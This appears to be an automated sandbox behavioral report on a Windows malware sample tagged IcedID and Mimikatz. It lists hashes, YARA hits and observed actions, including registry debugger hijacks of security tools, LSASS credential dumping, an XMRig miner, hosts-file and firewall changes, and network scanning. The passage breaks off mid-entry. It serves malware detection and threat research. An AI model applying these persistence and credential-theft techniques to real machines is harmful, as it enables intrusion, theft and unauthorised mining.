Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-01-2025 20:50
Behavioral task
behavioral1
Sample
2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe
-
Size
9.7MB
-
MD5
f45a50888b5fca0bd08d8fa64be0cdc3
-
SHA1
77a16c2b04a83ff587978f249cc5b1f03fde35a8
-
SHA256
d9adbd50f3fe970df0acbf02fd7341acbc8f2b158953642642bbfc58b635268f
-
SHA512
295e0af655a4d295c1ac0b1be8392545a9600c2e3becc57eff87e5f7c76f725815c6b9d460f009a4abd4100cacfd4b65f8d3feb5e2cb0dda550321679571f01e
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2100 created 2156 2100 yittybr.exe 38 -
Xmrig family
-
Contacts a large (30996) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/448-177-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp xmrig behavioral2/memory/448-181-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp xmrig behavioral2/memory/448-198-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp xmrig behavioral2/memory/448-211-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp xmrig behavioral2/memory/448-220-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp xmrig behavioral2/memory/448-233-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp xmrig behavioral2/memory/448-248-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp xmrig behavioral2/memory/448-493-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp xmrig behavioral2/memory/448-494-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp xmrig behavioral2/memory/448-496-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp xmrig behavioral2/memory/448-751-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp xmrig behavioral2/memory/448-752-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4240-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4240-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023c19-5.dat mimikatz behavioral2/memory/3324-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2420-137-0x00007FF65E7B0000-0x00007FF65E89E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts yittybr.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts yittybr.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1304 netsh.exe 4120 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 3324 yittybr.exe 2100 yittybr.exe 1772 wpcap.exe 3868 bjfisnrbq.exe 2420 vfshost.exe 5004 btjlhtrlh.exe 1784 xohudmc.exe 3308 nslfoo.exe 448 ttlnnh.exe 3368 btjlhtrlh.exe 2584 btjlhtrlh.exe 5108 btjlhtrlh.exe 1308 btjlhtrlh.exe 4424 btjlhtrlh.exe 4240 btjlhtrlh.exe 2660 btjlhtrlh.exe 4284 btjlhtrlh.exe 672 btjlhtrlh.exe 652 btjlhtrlh.exe 1724 yittybr.exe 1476 btjlhtrlh.exe 4744 btjlhtrlh.exe 2356 btjlhtrlh.exe 4412 btjlhtrlh.exe 3280 btjlhtrlh.exe 4340 btjlhtrlh.exe 2036 btjlhtrlh.exe 4112 vmlbqggye.exe 1324 yittybr.exe -
Loads dropped DLL 12 IoCs
pid Process 1772 wpcap.exe 1772 wpcap.exe 1772 wpcap.exe 1772 wpcap.exe 1772 wpcap.exe 1772 wpcap.exe 1772 wpcap.exe 1772 wpcap.exe 1772 wpcap.exe 3868 bjfisnrbq.exe 3868 bjfisnrbq.exe 3868 bjfisnrbq.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 61 ifconfig.me 62 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\nslfoo.exe xohudmc.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\nslfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 yittybr.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies yittybr.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F yittybr.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe -
resource yara_rule behavioral2/memory/2420-136-0x00007FF65E7B0000-0x00007FF65E89E000-memory.dmp upx behavioral2/files/0x0007000000023cb2-135.dat upx behavioral2/memory/2420-137-0x00007FF65E7B0000-0x00007FF65E89E000-memory.dmp upx behavioral2/files/0x0007000000023cbd-140.dat upx behavioral2/memory/5004-141-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/5004-156-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/files/0x0007000000023cba-162.dat upx behavioral2/memory/448-164-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx behavioral2/memory/3368-170-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/2584-174-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/448-177-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx behavioral2/memory/5108-179-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/448-181-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx behavioral2/memory/1308-184-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/4424-188-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/4240-192-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/2660-196-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/448-198-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx behavioral2/memory/4284-201-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/672-205-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/652-209-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/448-211-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx behavioral2/memory/1476-218-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/448-220-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx behavioral2/memory/4744-223-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/2356-227-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/4412-230-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/3280-232-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/448-233-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx behavioral2/memory/4340-235-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/2036-237-0x00007FF7F3500000-0x00007FF7F355B000-memory.dmp upx behavioral2/memory/448-248-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx behavioral2/memory/448-493-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx behavioral2/memory/448-494-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx behavioral2/memory/448-496-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx behavioral2/memory/448-751-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx behavioral2/memory/448-752-0x00007FF7C8140000-0x00007FF7C8260000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\ppgkyibiq\UnattendGC\specials\vimpcsvc.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\crli-0.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\trch-1.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\xdvl-0.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\vimpcsvc.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\svschost.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\schoedcl.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\schoedcl.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\schoedcl.xml yittybr.exe File opened for modification C:\Windows\tllefmnq\spoolsrv.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\AppCapture64.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\libxml2.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\posh-0.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\AppCapture32.dll yittybr.exe File created C:\Windows\ppgkyibiq\Corporate\mimilib.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\docmicfg.exe yittybr.exe File opened for modification C:\Windows\tllefmnq\vimpcsvc.xml yittybr.exe File opened for modification C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt vmlbqggye.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\exma-1.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\spoolsrv.exe yittybr.exe File opened for modification C:\Windows\tllefmnq\docmicfg.xml yittybr.exe File opened for modification C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\libeay32.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\docmicfg.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\spoolsrv.xml yittybr.exe File created C:\Windows\ppgkyibiq\Corporate\vfshost.exe yittybr.exe File created C:\Windows\ime\yittybr.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\coli-0.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\ssleay32.dll yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\vimpcsvc.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\zlib1.dll yittybr.exe File opened for modification C:\Windows\ppgkyibiq\Corporate\log.txt cmd.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\cnli-1.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\trfo-2.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\tucl-1.dll yittybr.exe File created C:\Windows\tllefmnq\svschost.xml yittybr.exe File created C:\Windows\tllefmnq\docmicfg.xml yittybr.exe File created C:\Windows\ppgkyibiq\upbdrjv\swrpwe.exe yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat yittybr.exe File created C:\Windows\tllefmnq\vimpcsvc.xml yittybr.exe File opened for modification C:\Windows\tllefmnq\svschost.xml yittybr.exe File opened for modification C:\Windows\tllefmnq\schoedcl.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\tibe-2.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\svschost.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\docmicfg.xml yittybr.exe File created C:\Windows\tllefmnq\schoedcl.xml yittybr.exe File opened for modification C:\Windows\tllefmnq\yittybr.exe 2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe File created C:\Windows\ppgkyibiq\UnattendGC\svschost.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\ucl.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\spoolsrv.xml yittybr.exe File created C:\Windows\ppgkyibiq\Corporate\mimidrv.sys yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\ip.txt yittybr.exe File created C:\Windows\tllefmnq\yittybr.exe 2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe yittybr.exe File created C:\Windows\tllefmnq\spoolsrv.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\Shellcode.ini yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll yittybr.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4228 sc.exe 2648 sc.exe 4704 sc.exe 2024 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslfoo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bjfisnrbq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened 